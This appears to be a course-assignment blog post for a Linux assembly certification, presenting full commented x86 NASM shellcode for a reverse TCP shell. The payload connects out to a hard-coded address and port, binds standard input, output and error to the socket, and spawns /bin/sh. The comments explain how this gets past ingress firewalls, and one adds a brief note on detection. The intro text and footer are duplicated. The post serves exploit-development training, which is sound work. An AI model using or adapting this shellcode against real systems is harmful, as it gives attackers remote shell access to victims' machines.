Assignment #2: Create Shell_Reverse_TCP shellcode
In this assignment our goal is to create a reverse tcp shell.
The main difference between a bind TCP shell and a reverse TCP shell is that, instead of calling sys_listen() and sys_accept() on the socket, the socket is handed to sys_connect().
The advantage of sys_connect over the (sys_listen, sys_accept) pair is that the system is made to connect out to a specified IP address and port, which allows us to obtain access to a system that sits behind a firewall filtering ingress traffic.
The image below is an example of the reverse tcp shell created for this assignment.
The following is the reverse tcp shell written for this assignment:
This blog post was created to fulfil the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-7730
All source files can be found on GitHub at https://github.com/br0ns0n/SLAE32
The main difference between a bind TCP shell and a reverse TCP shell is that, instead of calling sys_listen() and sys_accept() on the socket, the socket is handed to sys_connect().
The advantage of sys_connect over the (sys_listen, sys_accept) pair is that the system is made to connect out to a specified IP address and port, which allows us to obtain access to a system that sits behind a firewall filtering ingress traffic.
The image below is an example of the reverse tcp shell created for this assignment.
The following is the reverse tcp shell written for this assignment:
; ---------------------------------------------------------------------
; Reverse TCP shell -- x86-32 Linux, NASM syntax, raw int 0x80 syscalls.
; Equivalent C:
;   s = socket(AF_INET, SOCK_STREAM, 0);
;   connect(s, {AF_INET, htons(1337), 127.1.1.1}, 16);
;   dup2(s, 2); dup2(s, 1); dup2(s, 0);
;   execve("/bin//sh", NULL, NULL);
; Register roles:
;   ebx = socketcall sub-function number, later the socket fd
;   ecx = pointer to the args array / sockaddr, later the dup2 counter
;   esi = socket fd between the socket() and connect() calls
; Note: no syscall return value is checked.  The 8-bit `mov al, ...`
;   syscall-number writes below assume the preceding call left the upper
;   24 bits of eax zero (i.e. returned 0 or a small fd); a failed connect()
;   leaves -errno in eax and the next int 0x80 would carry a wrong number.
; Detection note: the observable sequence -- an outbound connect() from a
;   process, stdin/stdout/stderr dup2'd onto that socket, then execve of
;   /bin//sh -- is the classic reverse-shell pattern that syscall / EDR
;   telemetry keys on.
; ---------------------------------------------------------------------
global _start
section .text
_start:
; int socketcall(int call, unsigned long *args)
; sockfd = socket(int socket_family, int socket_type, int protocol)
sub ebx, ebx                    ; ebx = 0
mov ecx, ebx                    ; ecx = 0
mul ecx                         ; edx:eax = eax * 0 -> eax = 0, edx = 0
sub esp, 12                     ; reserve the 3-dword args array for socket()
mov dword [esp+0x8], ebx        ; args[2] = 0 (protocol, IP_PROTO 0)
mov dword [esp+0x4], 0x1        ; args[1] = SOCK_STREAM (1)
mov dword [esp], 0x2            ; args[0] = AF_INET (2)
mov ecx, esp                    ; ecx = &args
mov eax, 0x66                   ; eax = sys_socketcall (0x66)
inc ebx                         ; ebx = 1 = SYS_SOCKET sub-function
int 0x80                        ; eax = sockfd (or -errno; not checked)
xchg esi, eax                   ; esi = sockfd
; int socketcall(int call, unsigned long *args)
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
; Build struct sockaddr_in on the stack, last member first.
inc ebx                         ; ebx = 2 = AF_INET (reused as sin_family)
push 0x0101017F                 ; sin_addr.s_addr = 127.1.1.1 (bytes 7F 01 01 01, network order)
push word 0x3905                ; sin_port = htons(1337) (bytes 05 39 -> 0x0539)
push bx                         ; sin_family = AF_INET (2), 16-bit
; Only 8 bytes are pushed; the 16-byte addrlen below covers 8 bytes of
; whatever sits above on the stack (the socket() args array) in place of
; sin_zero, which the kernel does not inspect for AF_INET.
inc ebx                         ; ebx = 3 = SYS_CONNECT sub-function
mov ecx, esp                    ; ecx = &sockaddr_in
push 0x10                       ; args[2] = addrlen = 16
push ecx                        ; args[1] = &sockaddr_in
push esi                        ; args[0] = sockfd
mov ecx, esp                    ; ecx = &args
mov eax, 0x66                   ; eax = sys_socketcall (0x66)
int 0x80                        ; eax = 0 on success (or -errno; not checked)
xchg ebx, esi                   ; ebx = sockfd (dup2 oldfd); esi = 3
; dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0): bind stderr, stdout,
; stdin to the socket.
sub ecx, ecx                    ; ecx = 0
mov cl, 0x2                     ; ecx = 2 = first newfd
loop:
mov al, 0x3f                    ; eax = sys_dup2 (0x3f); assumes eax upper bits already 0
int 0x80                        ; dup2(ebx, ecx); returns newfd (2, 1, then 0) in eax
dec ecx                         ; ecx = next newfd; sets SF once ecx goes to -1
jns loop                        ; loop while ecx >= 0, i.e. newfd 2, 1, 0
; execve("/bin//sh", NULL, NULL)
xor edx, edx                    ; edx = 0 = envp
push edx                        ; NUL terminator for the path string
push 0x68732f2f                 ; "//sh" (little-endian dword)
push 0x6e69622f                 ; "/bin" -> "/bin//sh\0" at esp; the double
                                ; slash pads the path to two whole dwords
mov ecx, edx                    ; ecx = 0 = argv
mov ebx, esp                    ; ebx = pathname
mov al, 0x0b                    ; eax = sys_execve (0x0b); relies on last dup2 having returned 0
int 0x80                        ; execve never returns on success
This blog post was created to fulfil the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-7730
All source files can be found on GitHub at https://github.com/br0ns0n/SLAE32